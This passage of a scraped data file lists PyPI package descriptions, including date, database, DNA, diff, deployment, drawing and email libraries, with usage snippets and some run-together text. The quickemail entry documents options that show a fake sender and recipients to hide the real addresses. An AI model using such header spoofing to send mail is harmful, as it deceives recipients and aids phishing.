days\u3001weeks\u3001months\u3001years\u3001hours\u3001minutes\u3001seconds\u53c2\u6570\uff0c\u5e76\u8fd4\u56de\u4e3a DateLocate\u5bf9\u8c61\u672c\u8eab\u8fd9\u610f\u5473\u7740\uff0c\u53ef\u4ee5\u94fe\u5f0f\u5b9a\u4f4d\u65e5\u671f\uff0c\u66f4\u4e3a\u65b9\u4fbf\u5feb\u6377>>>fromquickdate.quickdateimportDateLocate>>>DateLocate().format(\"%Y-%m-%d\")2023-08-21>>>fromquickdate.quickdateimportDateLocate>>>DateLocate.parse('20230821').format(\"%Y-%m-%d\")2023-08-21\u5176\u4e2d\uff0c parse 
also supports the following date and time formats, among others:
>>> DateLocate.parse('22nd,July,2009').format("%Y-%m-%d")
2009-07-22
>>> DateLocate.parse('2018-04-20').format("%Y-%m-%d")
2018-04-20
>>> DateLocate.parse('2018').format("%Y-%m-%d")
2018-08-21
>>> DateLocate.parse('5,').format("%Y-%m-%d")
2023-08-05
>>> DateLocate.parse('9:10:8').format("%Y-%m-%d %H:%M:%S")
2023-08-21 09:10:08
>>> DateLocate.parse('02/11/2016').format("%Y-%m-%d %H:%M:%S")
2016-02-11 00:00:00
Below, taking today as the starting point, the usage of the quickdate library is explained.
# Locate a date by day
>>> DateLocate().format("%Y-%m-%d")
2023-08-21
>>> DateLocate().add(days=-1).format("%Y-%m-%d")
2023-08-20
# Locate a date by week
>>> DateLocate().add(weeks=-1).format("%Y-%m-%d")
2023-08-14
# Locate a date by month
>>> DateLocate().add(months=-1).format("%Y-%m-%d")
2023-07-21
# In particular, if today is the last day of the month, getting the previous month's date is corrected to the exact last day of the previous month
>>> DateLocate.parse("2023-03-31").add(months=-1).format("%Y-%m-%d")
2023-02-28
# Locate a date by year
>>> DateLocate().add(years=-1).format("%Y-%m-%d")
2022-08-21
Besides passing a single argument as above, you can also combine several arguments when locating a date (but each argument may only be passed once):
>>> DateLocate().add(weeks=-1,days=2,months=-2,years=-1).format("%Y-%m-%d")
2022-06-16
Chained calls are also possible:
>>> DateLocate().add(days=-1).add(weeks=-3).lastDay().format("%Y-%m-%d")
2023-07-31
You can also directly set the year, month, day, hour, minute and second values as needed:
>>> DateLocate().year(2022).month(12).day(5).hour(10).format("%Y-%m-%d %H:%M:%S")
2022-12-05 10:41:47
With the week function you can get the date of any weekday (Monday through Sunday) in the same week as the located date:
>>> DateLocate().week(5).format("%Y-%m-%d")
2023-08-25
With the lastDay function you can get the last day of the month of the located date:
>>> DateLocate().lastDay().format("%Y-%m-%d")
2023-08-31
Use cases
Get today's date:
>>> from quickdate.quickdate import DateLocate
>>> DateLocate().format("%Y-%m-%d")
2023-08-21
Get yesterday's date:
>>> DateLocate().add(days=-1).format("%Y-%m-%d")
2023-08-20
Get the date of last Wednesday:
>>> DateLocate().add(weeks=-1).week(3).format("%Y-%m-%d")
2023-08-16
Get the last day of this month one year ago:
>>> DateLocate().add(years=-1).lastDay().format("%Y-%m-%d")
2022-08-31
Get the 1st of last month:
>>> DateLocate().add(months=-1).day(1).format("%Y-%m-%d")
2023-07-01
Get the date of Saturday two weeks ago:
>>> DateLocate().add(weeks=-2).week(6).format("%Y-%m-%d")
2023-08-12
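As one more worked example (added here, not part of the original write-up), the documented methods can be combined to build a common reporting window, the first and last day of the previous month relative to today:
from quickdate.quickdate import DateLocate

# Both calls rely only on methods described above: add(months=-1), day(1), lastDay() and format().
start = DateLocate().add(months=-1).day(1).format("%Y-%m-%d")
end = DateLocate().add(months=-1).lastDay().format("%Y-%m-%d")
print(start, end)  # e.g. 2023-07-01 2023-07-31 when run on 2023-08-21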
"}
{"package": "quickdb", "pacakge-description": "1. Module introduction
quickdb is a collection of helpers for working with mysql, postgresql, kafka, mongo and redis.
2. mysql
sqlalchemy is used to define a class for it, MysqlSQLAlchemyEngine.
2.1 MysqlSQLAlchemyEngine
This class inherits from SQLAlchemyEngineBase and is used to define the connection; it accepts the parameters of sqlalchemy's create_engine:
engine = MysqlSQLAlchemyEngine(host='localhost', port=3306, user='root', pwd='1234', db='test')

with engine.session() as session, session.begin:
    pass

with engine.connection() as conn, conn.begin:
    pass
2.2 MysqlSQLAlchemyEngine methods
It has the following methods: reverse_table_model (reverse-engineer table models), insert (one or more rows), upsert (one or more rows), delete, execute, merge. The main one to explain is reverse_table_model.
This method has three parameters: path, the path of the generated model file, including the file name; tables, the tables you need, optional; commands, extra commands.
method = MysqlSQLAlchemyMethods(engine=engine)
method.reverse_table_model(path='./modules.py')
3. postgresql
Same as mysql.
4. kafka
Mainly provides a with-style context manager and a convenient send, which converts msg to bytes for you and can also flush at the same time.
p = KafkaMsgProducer(server=xxx)
p.send(topic, msg)

with KafkaMsgProducer(server=xxx) as p:
    p.send()
5. mongo
get_collection returns a modified Collection object with two new methods: iter, to iterate over the collection quickly, and upsert_one, a convenient shorthand for insert-or-update.
conn = MongoConn(host, port)
col = conn.get_collection(db, col)

for i in col.iter():
    print(i)
It also supports with, so connections are released automatically:
conn = MongoConn(host, port)
col = conn.get_collection(db, col)
conn.close()

with MongoConn(host, port) as conn:
    col = conn.get_collection(db, col)
6. redis
1. RedisConn
with RedisConn() as conn:
    pass
2. RedisLock
This is a blocking redis transaction lock.
with RedisLock(lock_name=""):
    pass
3. RedisLockNoWait
This is a non-blocking redis transaction lock: only the caller that acquires the lock runs its code, and callers that fail to acquire it do not keep waiting for the lock, but you need to check lock_success.
with RedisLockNoWait(lock_name="") as lock:
    if lock.lock_success:
        ..."}
{"package": "quickdebrepo", "pacakge-description": "UNKNOWN"}
{"package": "quick-debug", "pacakge-description": "UNKNOWN"}
{"package": "quickdemo", "pacakge-description": "quickdemo
For when unit tests would be too much! quickdemo is a tiny Python library for code demonstrations and small-scale testing. If your debugging tool of choice is printing to stdout, this might be the right library for you. quickdemo allows you to decorate any module-level function with an invocation or testing directive:
import quickdemo as qd

@qd.expect([1, 2], [0, 1], 1)
@qd.run([1, 2, 3], 5)
def add_to_list(input_list, number):
    return [x + number for x in input_list]
The snippet above produces the following output:
add_to_list([1, 2, 3], 5) -> [6, 7, 8]
Passed: add_to_list([0, 1], 1)
Check out the showcase*.py files for more examples! I developed quickdemo for two reasons: Firstly, when presenting solutions to other people, I always wrote several print statements per function to demonstrate the correctness of the solution. The print statements always added up quickly, making it
difficult to discern which output corresponded to which function.\nAlso, changing any function name implied re-writing the invocation code.\nThis was especially tedious when working with Jupyter Notebooks, where you have to take great care to re-run a cell each time something changes.Secondly, there is an educational programming language calledPyret, which allows writing short unit tests as part of a function definition.\nI believe this to be a sensible choice when targeting beginners.\nUnfortunately, Pyret code is neither readable nor particularly fast, so I decided to introduce this feature to Python as a part ofquickdemo."} +{"package": "quick-deploy", "pacakge-description": "Quick-DeployOptimize and deploy machine learning models fast and easy as possible.quick-deploy provide tools to optimize, convert and deploy machine learning models as fast inference API (low latency and high throughput) byTriton Inference ServerusingOnnx Runtimebackend. It support \ud83e\udd17 transformers, PyToch, Tensorflow, SKLearn and XGBoost models.Get StartedLet's see an quick example by deploying bert transformers for GPU inference. quick-deploy already have support \ud83e\udd17 transformers so we can specify the path of pretrained model or just the name from the Hub:$quick-deploytransformers\\-nmy-bert-base\\-ptext-classification\\-mbert-base-uncased\\-o./models\\--model-typebert\\--seq-len128\\--cudaThe command above created the deployment artifacts by optimizing and converting the model to Onxx. Next just run the inference server:$dockerrun-it--rm\\--gpusall\\--shm-size256m\\-p8000:8000\\-p8001:8001\\-p8002:8002\\-v$(pwd)/models:/modelsnvcr.io/nvidia/tritonserver:21.11-py3\\tritonserver--model-repository=/modelsNow we can use tritonclient which uses gRPC calls to consume our model:importnumpyasnpimporttritonclient.httpfromscipy.specialimportsoftmaxfromtransformersimportBertTokenizer,TensorTypetokenizer=BertTokenizer.from_pretrained('bert-base-uncased')model_name=\"my_bert_base\"url=\"127.0.0.1:8000\"model_version=\"1\"batch_size=1text=\"The goal of life is [MASK].\"tokens=tokenizer(text=text,return_tensors=TensorType.NUMPY)triton_client=tritonclient.http.InferenceServerClient(url=url,verbose=False)asserttriton_client.is_model_ready(model_name=model_name,model_version=model_version),f\"model{model_name}not yet ready\"input_ids=tritonclient.http.InferInput(name=\"input_ids\",shape=(batch_size,9),datatype=\"INT64\")token_type_ids=tritonclient.http.InferInput(name=\"token_type_ids\",shape=(batch_size,9),datatype=\"INT64\")attention=tritonclient.http.InferInput(name=\"attention_mask\",shape=(batch_size,9),datatype=\"INT64\")model_output=tritonclient.http.InferRequestedOutput(name=\"output\",binary_data=False)input_ids.set_data_from_numpy(tokens['input_ids']*batch_size)token_type_ids.set_data_from_numpy(tokens['token_type_ids']*batch_size)attention.set_data_from_numpy(tokens['attention_mask']*batch_size)response=triton_client.infer(model_name=model_name,model_version=model_version,inputs=[input_ids,token_type_ids,attention],outputs=[model_output],)token_logits=response.as_numpy(\"output\")print(token_logits)Note:This does only model deployment the tokenizer and post-processing should be done in the client side. The full tansformers deployment is comming soon.For more use cases please check theexamplespage.InstallBefore install make sure to install just the target model eg.: \"torch\", \"sklearn\" or \"all\". 
There two options to use quick-deploy, by docker container:$dockerrun--rm-itrodrigobaron/quick-deploy:0.1.1-all--helpor install the python libraryquick-deploy:$pipinstallquick-deploy[all]Note:This will install the full vesionall.ContributingPlease follow theContributingguide.LicenseApache License 2.0"} +{"package": "quickder.arpa2", "pacakge-description": "Quick DER precompiled ASN.1 codeMany standards specifications define ASN.1 fragments.\nWe try to deliver them to you in shrink-wrapped form.Ideally, in Python all you would do to use ASN.1 from a\ngiven standard would be something likefrom quickder.rfc import rfc4511Similarly, in C all you would do to use the same standard\nwould be#include The Quick DER package offers just that. It comes with\npackages likequickder.rfcfor Python andquickder-rfcfor C. In both cases a namespace for specifications\nsurrounds the information. Multiple packages can add\ntheir pre-compiled things here.Have a look in therfc directoryfor an idea\nof how this is done."} +{"package": "quickder.itu", "pacakge-description": "Quick DER precompiled ASN.1 codeMany standards specifications define ASN.1 fragments.\nWe try to deliver them to you in shrink-wrapped form.Ideally, in Python all you would do to use ASN.1 from a\ngiven standard would be something likefrom quickder.rfc import rfc4511Similarly, in C all you would do to use the same standard\nwould be#include The Quick DER package offers just that. It comes with\npackages likequickder.rfcfor Python andquickder-rfcfor C. In both cases a namespace for specifications\nsurrounds the information. Multiple packages can add\ntheir pre-compiled things here.Have a look in therfc directoryfor an idea\nof how this is done."} +{"package": "quickder.rfc", "pacakge-description": "Quick DER precompiled ASN.1 codeMany standards specifications define ASN.1 fragments.\nWe try to deliver them to you in shrink-wrapped form.Ideally, in Python all you would do to use ASN.1 from a\ngiven standard would be something likefrom quickder.rfc import rfc4511Similarly, in C all you would do to use the same standard\nwould be#include The Quick DER package offers just that. It comes with\npackages likequickder.rfcfor Python andquickder-rfcfor C. In both cases a namespace for specifications\nsurrounds the information. Multiple packages can add\ntheir pre-compiled things here.Have a look in therfc directoryfor an idea\nof how this is done."} +{"package": "quickdev", "pacakge-description": "Example PackageThis is a highky opinionated framework for developing applications.I have been using bits and pieces of this for over two decades. 
This\nis a very early release of code that I am origanizing and documenting\nfor use by others."} +{"package": "quickdiagrams", "pacakge-description": "UNKNOWN"} +{"package": "quickdiary", "pacakge-description": "No description available on PyPI."} +{"package": "quickdiff", "pacakge-description": "quickdiffquickdiffis a python library for quickly finding nested differences between two python objects.Usage:fromquickdiffimport*a={1:1,2:2,3:[3],4:4}b={1:1,2:4,3:[3,4],5:5,6:6}report=quickdiff(a,b)assertreport==DiffReport(val_changes=[ValChange(path=[2],a=2,b=4)],type_and_val_changes=[],dict_items_added=[DictDiff(path=[],key=5,val=5),DictDiff(path=[],key=6,val=6)],dict_items_removed=[DictDiff(path=[],key=4,val=4)],iter_len_mismatch=[IterLenMismatch(path=[3],a_len=1,b_len=2)])Diff objects (ValChange,DictDiff, etc) are NamedTuples for improved ergonomics and thus can be unpacked as you would any tuple:forpath,a,binreport.val_changes:print(path,a,b)# ([2], 2, 4)Why not DeepDiffI wrote this becauseDeepDiffis quite slow as it's written in pure Python and has a lot of features.Quickdiff on the other hand is simple and written in Rust. The current implementation yields a 16x performance boost on my personal benchmarks.DevelopmentUsematurinfor development:pipinstallmaturinCompile development version with:maturindevelopmentRun tests:python-munittestdiscovertestsRoadmapsupport for sets (currently is treated as an iterator)parallelize for improved performance (by usingpyo3-ffito sidestep the Python runtime)attribute diff checking for python objectssupport custom__eq__()implementations"} +{"package": "quick-django", "pacakge-description": "quick-djangoCreate django project quickly single command with all necessary file like djnago app, urls.py, templates folder, static folder and add the default code in view.py,models.py,admin.py and create index.htmlHow to use quick-djangoStep: 1pipinstallquick-djangoStep: 2Windowopen cmd in your porject folder and run this commandpython-mquick-djangomyprojectmyproject_appLinuxopen terminal in your porject folder and run this commandpython3-mquick-djangomyprojectmyproject_appConfiguration# setting.pyINSTALLED_APPS=[....'myproject_app',]For Rest-ApiWindowopen cmd in your porject folder and run this commandpython-mquick-djangomyprojectmyproject_app--restapiLinuxopen terminal in your porject folder and run this commandpython3-mquick-djangomyprojectmyproject_app--restapiConfiguration# setting.pyINSTALLED_APPS=[....'myproject_app','rest_framework']Check Our Site :https://mefiz.compypi site :https://pypi.org/project/quick-django/"} +{"package": "quickdna", "pacakge-description": "quickdnaQuickdna is a simple, fast library for working with DNA sequences. It is up to 100x faster than Biopython for some\ntranslation tasks, in part because it uses a native Rust module (via PyO3) for the translation. However, it exposes\nan easy-to-use, type-annotated API that should still feel familiar for Biopython users.\u26a0Quickdna is \"pre-1.0\" software. Its API is still evolving. For now, if you're interested in using quickdna, we suggest you depend on anexact versionorgitrev, so that new releases don't break your code.# These are the two main library types. 
Unlike Biopython, DnaSequence and# ProteinSequence are distinct, though they share a common BaseSequence base class>>>fromquickdnaimportDnaSequence,ProteinSequence# Sequences can be constructed from strs or bytes, and are stored internally as# ascii-encoded bytes.>>>d=DnaSequence(\"taatcaagactattcaaccaa\")# Sequences can be sliced just like regular strings, and return new sequence instances.>>>d[3:9]DnaSequence(seq='tcaaga')# many other Python operations are supported on sequences as well: len, iter,# ==, hash, concatenation with +, * a constant, etc. These operations are typed# when appropriate and will not allow you to concatenate a ProteinSequence to a# DnaSequence, for example# DNA sequences can be easily translated to protein sequences with `translate()`.# If no table=... argument is given, NBCI table 1 will be used by default...>>>d.translate()ProteinSequence(seq='*SRLFNQ')# ...but any of the NCBI tables can be specified. A ValueError will be thrown# for an invalid table.>>>d.translate(table=22)ProteinSequence(seq='**RLFNQ')# This exists too! It's somewhat faster than Biopython, but not as dramatically as# `translate()`>>>d[3:9].reverse_complement()DnaSequence(seq='TCTTGA')# This method will return a list of all (up to 6) possible translated reading frames:# (seq[:], seq[1:], seq[2:], seq.reverse_complement()[:], ...)>>>d.translate_all_frames()(ProteinSequence(seq='*SRLFNQ'),ProteinSequence(seq='NQDYST'),ProteinSequence(seq='IKTIQP'),ProteinSequence(seq='LVE*S*L'),ProteinSequence(seq='WLNSLD'),ProteinSequence(seq='G*IVLI'))# translate_all_frames will return less than 6 frames for sequences of len < 5>>>len(DnaSequence(\"AAAA\").translate_all_frames())4>>>len(DnaSequence(\"AA\").translate_all_frames())0# There is a similar method, `translate_self_frames`, that only returns the# (up to 3) translated frames for this direction, without the reverse complement# The IUPAC ambiguity codes are supported as well.# Codons with N will translate to a specific amino acid if it is unambiguous,# such as GGN -> G, or the ambiguous amino acid code 'X' if there are multiple# possible translations.>>>DnaSequence(\"GGNATN\").translate()ProteinSequence(seq='GX')# The fine-grained ambiguity codes like \"R = A or G\" are accepted too, and# translation results are the same as Biopython. In the output, amino acid# ambiguity code 'B' means \"either asparagine or aspartic acid\" (N or D).>>>DnaSequence(\"RAT\").translate()ProteinSequence(seq='B')# To disallow ambiguity codes in translation, try: `.translate(strict=True)`BenchmarksFor regular DNA translation tasks, quickdna is faster than Biopython. 
(Seebenchmarks/bench.pyfor source).\nMachines and workloads vary, however -- always benchmark!tasktimecomparisontranslate_quickdna(small_genome)0.00306ms / itertranslate_biopython(small_genome)0.05834ms / iter1908.90%translate_quickdna(covid_genome)0.02959ms / itertranslate_biopython(covid_genome)3.54413ms / iter11979.10%reverse_complement_quickdna(small_genome)0.00238ms / iterreverse_complement_biopython(small_genome)0.00398ms / iter167.24%reverse_complement_quickdna(covid_genome)0.02409ms / iterreverse_complement_biopython(covid_genome)0.02928ms / iter121.55%Should you use quickdna?Quickdna prosIt's quick!It's simple and small.It has type annotations, including apy.typedmarker file for checkers like MyPy or VSCode's PyRight.It makes a type distinction between DNA and protein sequences, preventing confusion.Quickdna cons:It's newer and less battle-tested than Biopython.It's not yet 1.0 -- the API is liable to change in the future.It doesn't support reading FASTA files or many of the other tasks Biopython can do,\nso you'll probably end up still using Biopython or something else to do those tasks.InstallationQuickdna has prebuilt wheels for Linux (manylinux2010), OSX, and Windows availableon PyPi.DevelopmentQuickdna usesPyO3andmaturinto build and upload the wheels, andpoetryfor handling dependencies. This is handled via\naJustfile, which requiresJust, a command-runner similar tomake.PoetryYou can install poetry fromhttps://python-poetry.org, and it will handle the other python dependencies.JustYou can installJustwithcargo install just, and then run it in the project directory to get a list of commands.FlamegraphsThejust profilecommand requirescargo-flamegraph, please see that repository for installation instructions."} +{"package": "quickdoc", "pacakge-description": "UNKNOWN"} +{"package": "quickdocs", "pacakge-description": "QuickdocsCreates HTML docs from a project's readme and sphinx-apidoc.StatusSourceShieldsProjectHealthRepositoryPublishersActivityInstallationpipinstallquickdocsUsageTo create an up to date sphinx configuration:quickdocs.quickdocs.ymlNow we can build the documentation:sphinx-build-EdocsbuildThis will run copy and markup the project's readme at runtime so that you don't need to recompile the sphinx configuration unless any of the settings change.Required settings file fields:project: Quickdocs\nversion: 1.2.1\nauthor: Joel Lefkowitz\nhtml_title: Quickdocs\ngithub_url: JoelLefkowitz/quickdocsOptional settings:debug: # Default: False\nproject_root: # Default: os.getcwd()\nverbose_name: # Default: Nonemarkup_readme: # Default: True\nreadme_path: # Default: \"README.md\"apidoc_module_dir: # Default: NoneIntegrating with readthedocs.readthedocs.yml:version: 2\n\nsphinx:\n configuration: docs/conf.py\n\nformats: all\n\npython:\n version: 3.8\n install:\n - requirements: docs/requirements.txtRemoving old documentationThe sphinx-apidoc plugin generates documentation under docs/api. When running, the sphinx plugin will overwrite but not delete out of date files in this directory. This means if you rename a module you must delete the out of date documentation. 
This package should not delete the docs/api directory because some developers will add custom documentation to this directory as they write new modules.TestsTo run unit tests and generate a coverage report:grunttests:unitDocumentationThis repository's documentation is hosted onreadthedocs.To generate the sphinx configuration:gruntdocs:generateThen build the documentation:gruntdocs:buildToolingTo run linters:gruntlintTo run formatters:gruntformatBefore committing new code:gruntprecommitThis will run linters, formatters, tests, generate a test coverage report and the sphinx configuration.Continuous integrationThis repository uses Travis CI to build and test each commit. Formatting tasks and writing documentation must be done before committing new code.VersioningThis repository adheres to semantic versioning standards.\nFor more information on semantic versioning visitSemVer.Bump2version is used to version and tag changes.\nFor example:bump2versionpatchChangelogPlease read this repository'sCHANGELOGfor details on changes that have been made.ContributingPlease read this repository's guidelines onCONTRIBUTINGfor details on our code of conduct and the process for submitting pull requests.ContributorsJoel Lefkowitz-Initial work-Joel LefkowitzRemarksLots of love to the open source community!"} +{"package": "quickdone", "pacakge-description": "Get Things Done Quickly!Usage$pipinstallquickdone>>>importquickdoneasqdfp() short for format_path(file_path)>>>qd.fp(r'C:\\Users\\user_name\\Desktop\\test.xlsx')'C:/Users/user_name/Desktop/test.xlsx'etc() short for excel_to_csv(input_path,output_path,input_enc,output_enc)>>>qd.etc(r'C:\\Users\\user_name\\Desktop\\test.xlsx',r'C:\\Users\\user_name\\Desktop\\test.csv')Packaging$pythonsetup.pysdistbdist_wheel\n$twineuploaddist/*For more, seepython packaging-projectsorPackaging and distributing projects"} +{"package": "quickdraw", "pacakge-description": "quickdrawGoogle Quick, Draw!is a game which is\ntraining a neural network to recognise doodles.quickdrawis an API for using the Google Quick, Draw! dataquickdraw.withgoogle.com/data,\ndownloading the data files as and when needed, caching them locally and\nallowing them to be used.Getting startedWindowspipinstallquickdrawmacOSpip3installquickdrawLinux / Raspberry Pisudopip3installquickdrawUseOpen the Quick Draw data, pull back ananvildrawing and save it.fromquickdrawimportQuickDrawDataqd=QuickDrawData()anvil=qd.get_drawing(\"anvil\")anvil.image.save(\"my_anvil.gif\")Documentationquickdraw.readthedocs.io"} +{"package": "quickdrop", "pacakge-description": "QuickDropThis is a simple CLI for quickly sharing a file or folder via Dropbox\nthat's already located in a Dropbox folder.It's as simple as$ export DROPBOX_ACCESS_TOKEN=yourdropboxaccesstoken\n$ export DROPBOX_ROOT_PATH=yourdropboxrootpath\n$ pip install quickdrop\n\nCollecting quickdrop\n...\nSuccessfully installed quickdrop-x.y.z\n\n$ url \n\nOkay, is now shared, accessible via\nhttps://www.dropbox.com/sh/bunchofrandomchars/morerandomcharsnstuff?dl=0."} +{"package": "quickdsa", "pacakge-description": "No description available on PyPI."} +{"package": "quickdump", "pacakge-description": "quickdumpQuickly store arbitrary Python objects in local files.Library status - this is an experimental work in progress that hasn't been\nbattle-tested at all. 
The API will change often between versions, and you may\nlose all your data due to silly bugs.FeaturesStore arbitrary objects locallyNo config or boilerplate requiredDump to TCP serverDump to HTTP serverNotes(todo - rewrite this in a coherent manner)Currently, compression is applied per call todump. This isn't very\nefficient (probably?)Labels are slugified to prevent errors from invalid characters in the filenameQuickly dump (almost) any object you like:fromquickdumpimportqd,QuickDumperfromdecimalimportDecimalforiinrange(10):result=Decimal(i)**Decimal(\"0.5\")qd(result)And use them whenever it's convenient later:forobjinqd.iter_dumps():print(obj)# 0# 1.000000000000000000000000000# 1.414213562373095048801688724# ...Dump objects assigning a label, or create a dumper with a pre-configured label:qd(\"Arma\u00e7\u00e3o\",\"Campeche\",\"Solid\u00e3o\",label=\"beaches\")beach_dumper=QuickDumper(\"beaches\")beach_dumper(\"Morro das Pedras\",\"A\u00e7ores\",\"Gravat\u00e1\")Iterate over multiple labels (including the default):forobjinqd.iter_dumps(\"beaches\",\"default_dump\"):print(obj)Iterate only over objects that match some filter:deffilter_initial_a(obj):returnnotobj.startswith(\"A\")forobjinqd.iter_dumps(\"beaches\",filter_fun=filter_initial_a):print(obj)# Campeche# ...Someday\u2122Enable simple serialization of unpicklable types (e.g. save asockettype property of some object assocket's string representation instead of\njust ignoring the object)Quickdump by piping from shellFunction decorator able to log function inputs and/or outputsReal time visualization of dumped data and metadata"} +{"package": "quickEDA", "pacakge-description": "This is a very simple python package to do all EDA activities for any file.How to use:pip install quickEDA\n\nimport quickEDA \n\nfrom quickEDA import eda\n\neda(\"give your file path here\")Just pass the path of your file and get the exploratory data analysis done\nin few seconds.Provides statistical information like count of values, Mean, Standard deviation, Minimun value, maximum value, 25%, 50% & 75% percentile of all the numerical columnsProvides overview of the file like number of columns present, data type of each column, null values present and memory space occupied by this datasetSample of first 5 rowsSample of last 5rowsCorrelation value between each columnNo. of rows and columns presentMissing values in data & missing values percentageIf duplicate rows present & dupliacte values percentageScatter matrix - to visualize the spread of dataBox plot to identify outliersColumn wise detailsDistinct valuesMissing valuesIf zeroes presentIQRlower outliers and percentage in each columnupper outliers and percentage in each columnVisualize distribution or each columnRelationship between each x column with Y columnThings to Note:*Please place your 'Y' column or dependant feature as last column\n*If facing issue with path , try giving \"c:\\\\Users\\\\...... 
(double slash)\""}
{"package": "quickemail", "pacakge-description": "QuickEmail
Project introduction
A simple email sending tool. Supports sending with or without authentication. Uses UTF-8 encoding. Multiple recipients and Cc recipients can be declared in a single connection.
Usage
A simple email sending tool. Supports sending with or without authentication. Uses UTF-8 encoding.
from quickemail import QuickEmail
Before sending, define the sending essentials. Specify the host and port (required parameters):
quicksend = QuickEmail('mail.test.com', 25)  # SMTP sending port, 25 by default; SSL connections use 465
quicksend.debug = True  # turn on debugging
Define the HELO host name (this parameter can be omitted):
quicksend.helo = 'QuickEmail'  # the HELO host name must not contain spaces; can be omitted
quicksend.tls = True / quicksend.ssl = True  # enable startTLS or SSL; the SSL port is usually 465
Authentication user name and password, required parameters for authsend():
quicksend.mail_user = 'a'     # authentication user name
quicksend.user_pass = 'test'  # the authentication user's password

Sender and recipients are required parameters:
quicksend.mail_from = 'AA高A'  # sender address, format: FullName<address>
quicksend.mail_to = '一二三<123@test.com>,ABC'  # same format as above; separate multiple addresses with commas ","

Cc recipients (can be omitted):
quicksend.mail_cc = '一二三<123@test.com>'

Mail date definition (can be omitted):
quicksend.mail_date = 1691544067

Mail subject and content; HTML is supported:
quicksend.mail_subject = 'mY subject还有中文!'
quicksend.mail_content = 'red content一段中文'
quicksend.is_html = True

Adding attachments (can be omitted):
quicksend.mail_attach = ['abc.jpg']  # add attachments; the type is list

Advanced customisation (can be omitted):
quicksend.content_from = '邮件显示的假发件人'  # customises the sender shown in the mail body, usually to hide the real mail_from
quicksend.content_to = '邮件显示的假收件人'    # customises the recipient shown in the mail body, usually to hide the real mail_to
quicksend.content_cc = '邮件显示的假抄送人'    # customises the Cc shown in the mail body, usually to hide the real mail_cc
Use creatmsg() to build the mail body content (this step can be skipped): msg = quicksend.creatmsg()
Use authsend() or send() to send the mail; if creatmsg() has not been run, the msg argument can be omitted: quicksend.authsend(msg) or quicksend.send()
Error indication (returns True on success, False on failure):
result = quicksend.authsend(msg)
if result:
    print(result)

result = quicksend.send(msg)
if result:
    print(result)
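As a quick recap (added here, not part of the original description), the attributes documented above can be assembled into one end-to-end sketch; host, credentials and addresses below are illustrative placeholders only:
from quickemail import QuickEmail

quicksend = QuickEmail('mail.test.com', 465)
quicksend.ssl = True                       # SSL connection, hence port 465 as noted above
quicksend.mail_user = 'a'
quicksend.user_pass = 'test'
quicksend.mail_from = 'Tester<a@test.com>'
quicksend.mail_to = 'ABC<abc@test.com>'
quicksend.mail_subject = 'hello'
quicksend.mail_content = 'plain text body'

# creatmsg() is skipped, so authsend() is called without the msg argument.
if quicksend.authsend():                   # True on success, False on failure
    print('mail sent')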
"}
{"package": "quickemailverification", "pacakge-description": "Official Email Validation API library client for Python
QuickEmailVerification provides the quickest way to avoid fake / invalid emails. Get actual users by scanning email addresses. Remove invalid, dead and fake emails from your email list. Save time and money by sending mail to actual users.
Let's Get Started
To begin, sign up at quickemailverification.com and create a FREE account. After signing up and logging in, click on API Settings and then click Add API Key. To use the API you need 2 parameters.
email - (string) This is the email address you need to verify. It should be url encoded.
apikey - (string) This is the key you generated from the "api settings" page.
NOTE: Keep the API key with you. You'll need it to set up the client as explained below.
Installation
Make sure you have pip installed.
$ pip install quickemailverification
Versions
Works with [ 2.6 / 2.7 / 3.2 / 3.3 / 3.4 ]
Usage
import quickemailverification

client = quickemailverification.Client('Your_API_Key_Here')
quickemailverification = client.quickemailverification()

# PRODUCTION MODE
response = quickemailverification.verify('test@example.com')

# SANDBOX MODE
# response = quickemailverification.sandbox('valid@example.com')

print(response.body)  # The response is in the body attribute
Response information
A successful API call responds with the following values:
result string - The verified results will be: valid, invalid, unknown
reason string - Reason definitions are as below:
invalid_email - Specified email has invalid email address syntax
invalid_domain - Domain name does not exist
rejected_email - SMTP server rejected email. Email does not exist
accepted_email - SMTP server accepted email address
no_connect - SMTP server connection failure
timeout - Session time out occurred at SMTP server
unavailable_smtp - SMTP server is not available to process request
unexpected_error - An unexpected error has occurred
no_mx_record - Could not get MX records for domain
temporarily_blocked - Email is temporarily greylisted
exceeded_storage - SMTP server rejected email. Exceeded storage allocation
Defaults toFalse, but turn it on if you can."} +{"package": "quickemailverification", "pacakge-description": "Official Email Validation API library client for PythonQuickEmailVerification provides the quickest way to avoid fake / invalid\nemails.Get actual users by scanning email address.Remove invalid, dead and fake emails from your email list.Save time and money by sending mail to actual users.Let\u2019s Get StartedTo begin, signUp atquickemailverification.comand\ncreate a FREE account. After signup logged in, click onAPI\nSettingsand then\nclickAdd API Key. To use API you need 2 parameters.email - (string) This is a email address you need to verify. It should\nbe url encoded.apikey - (string) This is the key you generated from\n\u201capi settings\u201d page.NOTE: Keep API key with you. You\u2019ll need it to setup the client as explained below.InstallationMake sure you havepipinstalled.$pipinstallquickemailverificationVersionsWorks with [ 2.6 / 2.7 / 3.2 / 3.3 / 3.4 ]Usageimportquickemailverificationclient=quickemailverification.Client('Your_API_Key_Here')quickemailverification=client.quickemailverification()# PRODUCTION MODEresponse=quickemailverification.verify('test@example.com')# SANDBOX MODE# response = quickemailverification.sandbox('valid@example.com')print(response.body)# The response is in the body attributeResponse informationA successful API call responds with the following values:resultstring- The verified results will be:valid,invalid,unknownreasonstring- Reason definitions are as below:invalid_email- Specified email has invalid email address syntaxinvalid_domain- Domain name does not existrejected_email- SMTP server rejected email. Email does not existaccepted_email- SMTP server accepted email addressno_connect- SMTP server connection failuretimeout- Session time out occurred at SMTP serverunavailable_smtp- SMTP server is not available to process\nrequestunexpected_error- An unexpected error has occurredno_mx_record- Could not get MX records for domaintemporarily_blocked- Email is temporarily greylistedexceeded_storage- SMTP server rejected email. Exceeded storage\nallocationdisposabletrue | false-trueif the email address uses adisposabledomainaccept_alltrue | false-trueif the domain appears toaccept allemails delivered to that domainroletrue | false-trueif the email address is aroleaddress (manager@example.com,ceo@example.com, etc)freetrue | false-trueif the email address is from free\nemail provider like Gmail, Yahoo!, Hotmail etc.emailstring- Returns a normalized version.\n(Niki@example.com->niki@example.com)userstring- The local part of an email address.\n(niki@example.com->niki)domainstring- The domain of the provided email address.\n(niki@example.com->example.com)mx_recordstring- The preferred MX record of email domain. This\nfield contains empty string when MX record is not available.mx_domainstring- The domain name of the MX host. This field\ncontains empty string when MX record is not available.safe_to_sendtrue | false-trueif the email address is\nsafe for deliverabilitydid_you_meanstring- Returns email suggestions if specific\ntypo errors found in emailsuccesstrue | false-trueif the API request was\nsuccessfulmessagestring- Describes API call failure reasonHTTP Response headersTotal remaining credits can 